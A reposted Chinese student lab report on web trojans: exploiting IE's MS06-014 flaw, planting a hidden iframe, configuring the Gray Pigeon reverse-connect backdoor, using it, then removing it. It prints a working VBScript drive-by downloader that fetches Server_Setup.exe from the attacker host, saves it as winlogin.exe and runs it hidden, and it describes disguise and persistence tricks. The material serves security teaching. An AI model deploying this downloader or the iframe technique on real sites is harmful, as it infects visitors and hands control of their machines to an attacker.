《信息安全技術》實驗四木馬及遠程控制技術

本文轉載自查看原文 2017-11-27 15:14 2641

《信息安全技術》實驗四木馬及遠程控制技術

實驗目的

剖析網頁木馬的工作原理
理解木馬的植入過程
學會編寫簡單的網頁木馬腳本
通過分析監控信息實現手動刪除木馬

實驗內容

木馬生成與植入
利用木馬實現遠程控制
木馬的刪除

實驗人數

每組2人，本組為20155314 20155304

實驗環境

系統環境
- Windows Server 2003虛擬機
網絡環境
- 交換網絡結構

實驗工具

網絡協議分析器
灰鴿子
監控器

實驗類型

設計性實驗

實驗原理

一、網頁木馬原理及相關定義

瀏覽器是用來解釋和顯示萬維網文檔的程序，已經成為用戶上網時必不可少的工具之一。“網頁木馬”由其植入方式而得名，是通過瀏覽網頁的方式植入到被控主機上，並對被控主機進行控制的木馬。與其它網頁不同，木馬網頁是黑客精心制作的，用戶一旦訪問了該網頁就會中木馬。為什么說是黑客精心制作的呢？因為嵌入在這個網頁中的腳本恰如其分地利用了IE瀏覽器的漏洞，讓IE在后台自動下載黑客放置在網絡上的木馬並運行（安裝）這個木馬，也就是說，這個網頁能下載木馬到本地並運行（安裝）下載到本地電腦上的木馬，整個過程都在后台運行，用戶一旦打開這個網頁，下載過程和運行（安裝）過程就自動開始。

如果打開一個網頁，IE瀏覽器真的能自動下載程序和運行程序嗎？如果IE真的能肆無忌憚地任意下載和運行程序，那么用戶將會面臨巨大的威脅。實際上，為了安全，IE瀏覽器是禁止自動下載程序特別是運行程序的，但是，IE瀏覽器存在着一些已知和未知的漏洞，網頁木馬就是利用這些漏洞獲得權限來下載程序和運行程序的。本練習中，我們利用微軟的MS06014漏洞，完成網頁木馬的植入。

二、名詞解釋

MS06014漏洞 
MS06014漏洞存在於Microsoft Data Access Components，利用微軟的HTML Object標簽的一個漏洞，Object標簽主要是用來把ActiveX控件插入到HTML頁面里。由於加載程序沒有根據描述遠程Object數據位置的參數檢查加載文件的性質，因此Web頁面里面的程序就會不經過用戶的確認而自動執行。
iframe標簽

iframe也叫浮動幀標簽，它可以把一個HTML網頁嵌入到另一個網頁里實現“畫中畫”的效果。例如：
被嵌入的網頁可以控制寬、高以及邊框大小和是否出現滾動條等。如果把寬（width）、高（height）、邊框（frameborder）都設置為0，代碼插入到首頁后，首頁不會發生變化，但是嵌入的網頁實際上已經打開。
反彈端口型木馬 
分析防火牆的特性后可以發現，防火牆對於連入的鏈接往往會進行非常嚴格的過濾，但是對於連出的鏈接卻疏於防范。於是，與一般的木馬相反，反彈端口型木馬的服務端（被控制端）使用主動端口，客戶端（控制端）使用被動端口。木馬定時監測控制端的存在，發現控制端上線后立即彈出端口主動連接控制端打開的被動端口。服務端通常會把打開的端口偽裝成應用軟件的端口，從而進一步降低被防火牆發現的概率。
網頁木馬生成腳本 
通常網頁木馬是通過“網馬生成器”將木馬安裝程序的下載地址附加在網頁上的，進而達到用戶瀏覽含有木馬的網頁即自動下載安裝程序的目的。下面給出一個“網馬生成器”腳本，其中“//”后面的文字是對代碼的注釋。實驗中需改動此腳本，自己動手生成網頁木馬。

三、木馬的工作過程

木馬的工作過程可分為四部分：木馬的植入、木馬的安裝、木馬的運行和木馬的自啟動。

木馬的植入 
網頁木馬就是一個由黑客精心制作的含有木馬的HTML網頁，因為MS06014漏洞存在，當用戶瀏覽這個網頁時就被在后台自動安裝了木馬的安裝程序。所以黑客會千方百計的誘惑或者欺騙人們去打開他所制作的網頁，進而達到植入木馬的目的。不過隨着人們網絡安全意識的提高，這種方法已經很難欺騙大家了。

還有一種方法就是通過<iframe>標簽，在一個正常網站的主頁上鏈接網頁木馬。瀏覽者在瀏覽正常的網站主頁時，iframe語句就會鏈接到含有木馬的網頁，網頁木馬就被悄悄植入了。這種方法就是大家經常說的“掛馬”，而中了木馬的主機通常被幽默的稱作“肉雞”。“掛馬”因為需要獲取網站管理員的權限，所以難度很大。不過他的危害也是十分巨大的，如果黑客獲得了一個每天流量上萬的知名網站的管理員權限並成功“掛馬”，那試想他會有多少“肉雞”。
木馬的安裝 
木馬的安裝在木馬植入后就被立即執行。（本練習以灰鴿子木馬程序為例）當網頁木馬植入后，木馬會按照通過網頁木馬腳本中指向的路徑下載木馬服務端安裝程序，並根據腳本中的設定對安裝程序進行重命名。通常會重新命名一個與系統進程相近的名字（本實驗中為winlogin.exe）來迷惑管理員，使安裝過程及其留下的痕跡不通過細心查看不易被發覺。安裝程序下載完成后，自動進行安裝。生成可執行文件C:\Windows\hack.com.cn.ini，並修改注冊表生成名為windows XP Vista的系統服務。其中hack.com.cn.ini就是木馬服務器程序隱藏在背后的主謀。
木馬的運行 
灰鴿子木馬服務器安裝完成后就會立刻連接網絡尋找其客戶端，並與其建立連接。這時木馬程序會將自己的進程命名為IEXPLORE.EXE，此進程與Windows的IE瀏覽器進程同名，同樣是為了迷惑管理員來偽裝自己。當木馬服務端與客戶端建立連接后，客戶端就如同擁有了管理員權限一樣，可隨意對“肉雞”進行任何操作。
木馬的自啟動 
木馬安裝時生成系統服務Windows XP Vista。Windows XP Vista的可執行文件路徑：C:\WINDOWS\Hacker.com.cn.ini。描述：“灰鴿子服務端程序，遠程監控管理。”啟動類型：“自動。”很明顯可以看出灰鴿子是通過此系統服務執行hack.com.cn.ini文件來自啟動木馬服務器。存在於系統目錄下的Hack.com.cn.ini文件被設置成一個隱藏的受保護的操作系統文件，很難被人發現。

四、灰鴿子木馬的功能

灰鴿子歷程

| 時間 |事件|
| -------- | :----------------😐:----------------😐
|2000年| 第一個版本的灰鴿子誕生，並被各大安全廠商“關注”|
|2002年|灰鴿子被安全廠商列入病毒庫|
|2003年|灰鴿子“牽手版”受到安全愛好者的追捧，使用人數超過冰河|
|2003年|灰鴿子工作室開始進行商業運作，對用戶實行會員制|
|2004年|灰鴿子變種病毒泛濫，廣大網友談“灰”色變|
|2005年|灰鴿子發展迅速，灰鴿子工作室網站訪問量保持上升狀態，論壇注冊會員突破90000人|
|2006年|灰鴿子的發展達到頂峰，占據了木馬市場的半壁江山|
|2007年|灰鴿子引起國內各大殺軟廠商的聲討，對灰鴿子的“全民圍剿”正式開始。灰鴿子工作室最終關閉|
比起前輩冰河、黑洞來，灰鴿子可以說是國內后門的集大成者。其豐富而強大的功能、簡易便捷的操作、良好的隱藏性使其他木馬程序都相形見絀。灰鴿子客戶端和服務端都是采用Delphi編寫。利用客戶端程序配置出服務端程序，可配置的信息主要包括上線類型（如等待連接還是主動連接）、主動連接時使用的公網IP（域名）、連接密碼、使用的端口、啟動項名稱、服務名稱，進程隱藏方式，使用的殼，代理，圖標等等。
灰鴿子木馬的基本功能
1. 反向連接：由木馬的“服務器程序”主動發起連接，這種連接方式也稱為“反彈木馬”，它的優點是可以突破NAT和防火牆。
2. 文件管理：可以操作（查看、新建、刪除等）被控主機的文件系統及上傳下載文件。
3. 注冊表管理：可以操作（查看、新建、刪除等）被控主機的注冊表項。
4. 系統信息查看：可以查看被監控主機的系統配置信息等。
5. 剪貼板查看：可以查看被監控主機的剪貼板內容。
6. 進程管理：可以查看被監控主機的進程表或殺死某個進程。
7. 服務管理：可以啟動、停止被監控主機的服務程序。
8. 共享管理：可以新建、刪除被監控主機的共享。
9. Telnet：可以遠程控制被監控主機的命令行。
10. 配置代理服務器：可以利用被控制主機為跳板，對第三方進行攻擊。
11. 插件功能：可以捆綁第三方軟件。
12. 命令廣播：控制端可以把控制命令一次性廣播到若干台計算機。
13. 捕獲屏幕：可以查看被監控主機的屏幕圖像。
14. 視頻語音：可以進行視頻監控和語音監聽。

五．木馬的刪除

木馬的“客戶端程序”可以控制木馬的“服務器程序”的刪除工作。另一種方法是通過手動刪除，具體步驟將在“實驗步驟”中詳細說明。

實驗步驟

本練習主機A、B為一組，C、D為一組，E、F為一組。實驗角色說明如下：

實驗主機	實驗角色
主機A、C、E	木馬控制端（木馬客戶端）
主機B、D、F	木馬被控端（木馬服務器）

下面以主機A、B為例，說明實驗步驟。

首先在Windows Server 2003虛擬機中使用ipconfig命令查看虛擬機IP地址為172.16.0.135，再在本機上用ping命令嘗試與虛擬機連接：

如圖，表明連接成功。

一、木馬生成與植入

用戶主機通過訪問被“掛馬”的網站而被植入木馬的過程：

用戶訪問被“掛馬”的網站主頁。（此網站是安全的）
“掛馬”網站主頁中的<iframe>代碼鏈接一個網址（即一個網頁木馬），使用戶主機自動訪問網頁木馬。（通過把<iframe>設置成不可見的，使用戶無法察覺到這個過程）
網頁木馬在得到用戶連接后，自動發送安裝程序給用戶。
如果用戶主機存在MS06014漏洞，則自動下載木馬安裝程序並在后台運行。
木馬安裝成功后，木馬服務端定時監測控制端是否存在，發現控制端上線后立即彈出端口主動連接控制端打開的被動端口。
客戶端收到連接請求，建立連接。

（一）生成網頁木馬

主機A首先通過Internet信息服務(IIS)管理器啟動“木馬網站”。（為什么啟動木馬網站？）
主機A進入實驗平台在工具欄中單擊“灰鴿子”按鈕運行灰鴿子遠程監控木馬程序。第一次打開時發現程序下方提示"打開自動上線端口失敗！你不能使用自動上線功能！"，重新啟動程序即可解決該問題，如下圖：此時程序下方提示"連接成功！"等字樣，表明已成功上線。
主機A生成木馬的“服務器程序”。

主機A單擊木馬操作界面工具欄“配置服務程序”按鈕，彈出“服務器配置”對話框,單擊“自動上線設置”屬性頁，在“IP通知http訪問地址、DNS解析域名或固定IP”文本框中輸入本機IP地址，在“保存路徑”文本框中輸入D:\Work\IIS\Server_Setup.exe，單擊“生成服務器”按鈕，生成木馬“服務器程序”。（除了“自動上線設置”屬性頁，還有“安裝選項”、“啟動項設置”、“代理服務”、“高級選項”、“插件功能”屬性頁）（為什么在“保存路徑”文本框中輸入D:\Work\IIS\Server_Setup.exe？換為另一個路徑可以嗎？）

主機A編寫生成網頁木馬的腳本。

在桌面建立一個Trojan.txt文檔，打開Trojan.txt，將實驗原理中網馬腳本寫入，並將腳本第15行“主機IP地址”替換成主機A的IP地址172.16.0.135。把Trojan.txt文件擴展名改為.htm，生成Trojan.htm。網頁木馬源碼如下：

 <html>
 <script language="VBScript">
     <!-- 首先動態創建對象組件，並聲明組件的clsid -->
     Set df = document.createElement("object")
     df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
 
     <!-- 創建XMLHTTP對象，用來完成從數據包到Request對象的轉換以及發送任務 -->
     Set xh = df.createObject("Microsoft.XMLHTTP","")
 
     <!-- 創建Adodb.Stream對象，提供存取二進制數據或文本流，實現對流的讀、寫等操作 -->
     Set ados = df.createObject("Adodb.Stream","")
     ados.type = 1
 
     <!-- 使用HTTP GET初始化HTTP請求 -->
     url = "http://172.16.0.135:9090/Server_Setup.exe"
     xh.Open "GET", url, False
     <!-- 發送HTTP請求，並獲取HTTP響應 -->
     xh.Send
 
     <!-- 創建Scripting.FileSystem對象，提供對計算機文件系統進行訪問 -->
     Set fs = df.createObject("Scripting.FileSystemObject","")
     <!-- 獲取目標路徑，0為windows目錄；1為system目錄；2為用戶臨時目錄 -->
     Set tmpdir = fs.GetSpecialFolder(2)
     <!-- 向目標路徑后添加文件名稱winlogin.exe，此名稱與系統文件名相似，不易被察覺 -->
     fname1="winlogin.exe"
     fname1= fs.BuildPath(tmpdir,fname1)
 
     <!-- 打開Adodb.Stream對象，將服務器返回的響應數據寫入對象，將對象內容保存至目標文件-->
     ados.Open
     ados.Write xh.responseBody
     ados.SaveToFile fname1,2
     <!-- 文件系統操作完成，關閉對象 -->
     ados.Close
 
     <!-- 創建Shell對象，調用執行目標文件 -->
     Set sl = df.createObject("Shell.Application","")
     <!-- 以隱藏方式運行木馬 -->
     sl.ShellExecute fname1,"","","open",0
 </script>
 </html>

「注」C:\ExpNIS\NetAD-Lab\Projects\Trojan\Trojan.htm文件提供了VB腳本源碼。
將生成的Trojan.htm文件保存到D:\Work\IIS\目錄下(D:\Work\IIS\為“木馬網站”的網站空間目錄)，Trojan.htm文件就是網頁木馬程序。（為什么要將Trojan.htm文件保存到D:\Work\IIS\目錄下？）

（二）完成對默認網站的“掛馬”過程

主機A進入目錄C:\Inetpub\wwwroot，使用記事本打開index.html文件。

「注」“默認網站”的網站空間目錄為C:\Inetpub\wwwroot\,主頁為index.html
對index.html進行編輯。在代碼的底部加上<iframe>語句，具體見實驗原理-->名詞解釋-->iframe標簽（需將http://www.jlcss.com/index.html修改為http://本機IP:9090/Trojan.htm），實現從此網頁對網頁木馬的鏈接。（iframe標簽有什么作用？iframe也叫浮動幀標簽，它可以把一個HTML網頁嵌入到另一個網頁里實現“畫中畫”的效果。被嵌入的網頁可以控制寬、高以及邊框大小和是否出現滾動條等。如果把寬、高、邊框都設置為0，代碼插入到首頁后，首頁不會發生變化，但是嵌入的網頁實際上已經打開）（為什么使用9090端口？）
木馬的植入
1. 主機B設置監控。
  
  主機B進入實驗平台，單擊工具欄“監控器”按鈕，打開監控器。
  在向導欄中依次啟動“進程監控”、“端口監控”，選擇“文件監控”，在菜單欄中選擇“選項”-->“設置”，在設置界面中設置監視目錄C:\Windows\（默認已被添加完成），操作類型全部選中，啟動文件監控。
  
  啟動協議分析器，單擊菜單“設置”-->“定義過濾器”，在彈出的“定義過濾器”對話框中選擇“網絡地址”選項卡，設置捕獲主機A與主機B之間的數據。
  新建捕獲窗口，點擊“選擇過濾器”按鈕，確定過濾信息。在捕獲窗口工具欄中點擊“開始捕獲數據包”按鈕，開始捕獲數據包。
  
  主機B啟動IE瀏覽器，訪問http://主機A的IP地址。
2. 主機A等待“灰鴿子遠程控制”程序主界面的“文件管理器”屬性頁中“文件目錄瀏覽”樹中出現“自動上線主機”時通知主機B。
3. 主機B查看“進程監控”、“服務監控”、“文件監控”和“端口監控”所捕獲到的信息。（觀察木馬服務器端安裝程序的運行結果與配置服務器時的設置是否一致。）
  在“進程監控”-->“變化視圖”中查看是否存在“進程映像名稱”為Hacker.com.cn.ini的新增條目。觀察進程監控信息，結合實驗原理回答下面的問題。（Hacker.com.cn.ini在前面的過程中哪里設置的？）
  
  Hacker.com.cn.ini文件是由哪個進程創建的：Winlogin.exe；
  在“服務監控”中單擊工具欄中的“刷新”按鈕，查看是否存在“服務名稱”為“Windows XP Vista” 的新增條目，觀察服務監控信息，回答下面的問題。（Windows XP Vista服務在前面的過程中哪里設置的？）
  
  Windows XP vista服務的執行體文件是：C:\Windows\hack.com.cn.ini；
  在“文件監控”中查看“文件名”為C:\WINDOWS\Hacker.com.cn.ini的新增條目。
  在“端口監控”中查看“遠程端口”為“8000”的新增條目，觀察端口監控信息，回答下面問題：（端口8000在前面的過程中哪里設置的？主機A灰鴿子遠程控制軟件的服務器配置時設置的）
  8000服務遠程地址（控制端）地址：172.16.0.135；
  經過對上述監控信息的觀察，你認為在“進程監控”中出現的winlogoin.exe進程（若存在）在整個的木馬植入過程中起到的作用是：用於定時監測控制端是否存在，發現控制端上線后立即彈出端口主動連接控制端打開的被動端口；（winlogoin.exe在前面的過程中哪里設置的？在修改網頁掛馬腳本文件Trojan.htm時設置的）
4. 主機B查看協議分析器所捕獲的信息：

二、木馬的功能

（一）文件管理

主機B在目錄D:\Work\Trojan\下建立一個文本文件，並命名為Test.txt。
主機A操作“灰鴿子遠程控制”程序來對主機B進行文件管理。
單擊“文件管理器”屬性頁，效仿資源管理器的方法在左側的樹形列表的“自動上線主機”下找到主機B新建的文件D:\Work\Trojan\Test.txt。在右側的詳細列表中對該文件進行重命名操作。
在主機B上觀察文件操作的結果。

（二）系統信息查看

主機A操作“灰鴿子遠程控制”程序查看主機B的操作系統信息。單擊“遠程控制命令”屬性頁，選中“系統操作”屬性頁，單擊界面右側的“系統信息”按鈕，查看主機B操作系統信息。

（三）進程查看

主機A操作“灰鴿子遠程控制”程序對主機B啟動的進程進行查看
單擊“遠程控制命令”屬性頁，選中“進程管理”屬性頁，單擊界面右側的“查看進程”按鈕，查看主機B進程信息。
主機B查看“進程監控”-->“進程視圖”枚舉出的當前系統運行的進程，並和主機A的查看結果相比較。

（四）注冊表管理

主機A單擊“注冊表編輯器”屬性頁，在左側樹狀控件中“遠程主機”（主機B）注冊表的HKEY_LOCAL_MACHINE\Software\ 鍵下，創建新的注冊表項；對新創建的注冊表項進行重命名等修改操作；刪除新創建的注冊表項，主機B查看相應注冊表項。

（五）Telnet

主機A操作“灰鴿子遠程控制”程序對主機B進行遠程控制操作，單擊菜單項中的“Telnet”按鈕，打開Telnet窗口，使用cd c:\命令進行目錄切換，使用dir命令顯示當前目錄內容，使用其它命令進行遠程控制。

（六）其它命令及控制

主機A通過使用“灰鴿子遠程控制”程序的其它功能（例如“捕獲屏幕”），對主機B進行控制。

三、木馬的刪除

（一）自動刪除

主機A通過使用“灰鴿子遠程控制”程序卸載木馬的“服務器”程序。具體做法：選擇上線主機，單擊“遠程控制命令”屬性頁，選中“系統操作”屬性頁，單擊界面右側的“卸載服務端”按鈕，卸載木馬的“服務器”程序。

（二）手動刪除

主機B啟動IE瀏覽器，單擊菜單欄“工具”-->“Internet 選項”，彈出“Internet 選項”配置對話框，單擊“刪除文件”按鈕，在彈出的“刪除文件”對話框中，選中“刪除所有脫機內容”復選框，單擊“確定”按鈕直到完成。
雙擊“我的電腦”，在瀏覽器中單擊“工具”-->“文件夾選項”菜單項，單擊“查看”屬性頁，選中“顯示所有文件和文件夾”，並將“隱藏受保護的操作系統文件”復選框置為不選中狀態，單擊“確定”按鈕。
關閉已打開的Web頁，啟動“Windows 任務管理器”。單擊“進程”屬性頁，在“映像名稱”中選中所有“IEXPLORE.EXE”進程，單擊“結束進程”按鈕。
刪除C:\Widnows\Hacker.com.cn.ini文件。
啟動“服務”管理器。選中右側詳細列表中的“Windows XP Vista”條目，單擊右鍵，在彈出菜單中選中“屬性”菜單項，在彈出的對話框中，將“啟動類型”改為“禁用”，單擊“確定”按鈕。
啟動注冊表編輯器，刪除HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windows XP Vista節點。
重新啟動計算機。
主機A如果還沒卸載灰鴿子程序，可打開查看自動上線主機，已經不存在了。

課后測試

在網頁木馬實驗中，使用的掛馬方式是（）？

A. 利用iframe

【答案】A
在網頁木馬實驗中，木馬服務器端的自動下載和執行安裝利用的是（）的漏洞。

A. IIS

B. IE

C. HTTP

D. RPC

【答案】B
本次實驗中，木馬的自啟動方式是（）。

A. 利用修改文件關聯

B. 利用修改WIN.ini配置文件

C. 利用修改注冊表中以Run開頭的鍵值

D. 利用增加系統服務

【答案】D
關於在實驗中所生成的Server_Setup.exe，描述正確的是（）。

A. Server_Setup.exe是木馬服務端程序

B. Server_Setup.exe是木馬服務端安裝程序

C. Server_Setup.exe是客戶端程序

D. Server_Setup.exe是客戶端安裝程序

【答案】B
在木馬實驗中，關於目錄"C:\Inetpub\wwwroot"、"D:\Work\IIS"，網頁文件index.html、Trojan.htm和默認網站、木馬網站的關系描述正確的是（）？

A. index.html是默認網站的首頁，放在D:\Work\IIS\目錄下

B. index.html是木馬網站的首頁，放在C:\Inetpub\wwwroot\目錄下

C. Trojan.htm是木馬網站的頁面，放在D:\Work\IIS\目錄下

D. Trojan.htm是默認網站的頁面，放在C:\Inetpub\wwwroot\目錄下

【答案】C
木馬程序包含服務端和客戶端，通常都是服務端監聽到客戶端的連接請求時進行響應，然后建立服務端與客戶端的連接。本次實驗中木馬建立連接是（）端先發起連接請求？這種木馬被稱為（）木馬？

A. 客戶端，反彈端口型

B. 服務端，反彈端口型

C. 客戶端，復用端口型

D. 服務端，復用端口型

【答案】B
在實驗中，在“進程監控”中看到的新建的"Hacker.com.cn.ini"是由哪個進程創建的？

A. Explorer

B. IE

C. Winlogin

D. rundll32

【錯選】D

【答案】C
假設實驗中，攻擊者IP為172.16.0.83，被攻擊者IP為172.16.0.12，在實驗過程中捕獲了帶有如下內容的一些數據包：(1)Windows Server 2000 5.2(3790 Service Pack1);(2)GET/Trojan.htm;(3)Referer:http//172.16.0.83/;(4)GET/server_setup.exe;下列按捕獲的先后順序排列序號正確的是（）？

A. (1)(2)(3)(4)

B. (3)(1)(2)(4)

C. (3)(2)(4)(1)

D. (1)(3)(4)(2)

【答案】C
下圖是網頁木馬腳本的一部分，根據腳本回答如下問題：當訪問這個網頁時，會發送什么GET請求？

A. get/server_setup.exe

B. get/Trojan.htm

C. get/winlogin.exe

D. get/Hacker.com.cn.ini

【錯選】C

【答案】A
下圖是網頁木馬腳本的一部分，根據腳本回答如下問題：下載的文件會以什么為文件名？

A. Server_Setup.exe

B. winlogin.exe

C. trojan.exe

D. fname

【答案】B
下圖是網頁木馬腳本的一部分，根據腳本回答如下問題：保存到哪個目錄下？

A. windows目錄

B. system目錄

C. 用戶臨時目錄

D. Config目錄

【答案】C
下列哪些功能是木馬服務端不能夠實現的（）？

A. 文件訪問

B. 自動關機

C. 尋找漏洞

D. 添加用戶

【我的回答】C

思考題

列舉出幾種不同的木馬植入方法。
- 利用E-MAIL
- 軟件下載
- 利用共享和Autorun文件
- 把木馬文件轉換為圖片格式
- 偽裝成應用程序擴展組件
- 利用WinRar制作成自釋放文件
- 在Word文檔中加入木馬文件
- 把木馬和其他文件捆綁在一起
列舉出幾種不同的木馬防范方法。
- 為計算機安裝殺毒軟件，定期掃描系統、查殺病毒；及時更新病毒庫、更新系統補丁
- 下載軟件時盡量到官方網站或大型軟件下載網站，在安裝或打開來歷不明的軟件或文件前先殺毒
- 不隨意打開不明網頁鏈接，尤其是不良網站的鏈接，陌生人通過QQ給自己傳鏈接時，盡量不要打開
- 使用網絡通信工具時不隨便接收陌生人的文件，若接收，可在工具菜單欄中“文件夾選項”中取消“隱藏已知文件類型擴展名”的功能來查看文件類型
- 對公共磁盤空間加強權限管理，定期查殺病毒
- 打開移動存儲器前先用殺毒軟件進行檢查，可在移動存儲器中建立名為“autorun.inf”的文件夾（可防U盤病毒啟動）
- 需要從互聯網等公共網絡上下載資料轉入內網計算機時，用刻錄光盤的方式實現轉存
- 對計算機系統的各個賬號要設置口令，及時刪除或禁用過期賬號
- 定期備份，以便遭到病毒嚴重破壞后能迅速修復

參考資料

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 【信息安全技術】實驗報告：木馬及遠程控制技術生成遠程控制木馬以及提權 [可行]setoolkit生成木馬軟件遠程控制實例《信息安全技術》實驗一 PGP的原理與使用【信息安全技術】實驗報告：口令破解 TurtleBot3-鍵盤遠程控制 Kali實現靶機遠程控制遠程控制卡樹莓派：VNC遠程控制 linux遠程控制windows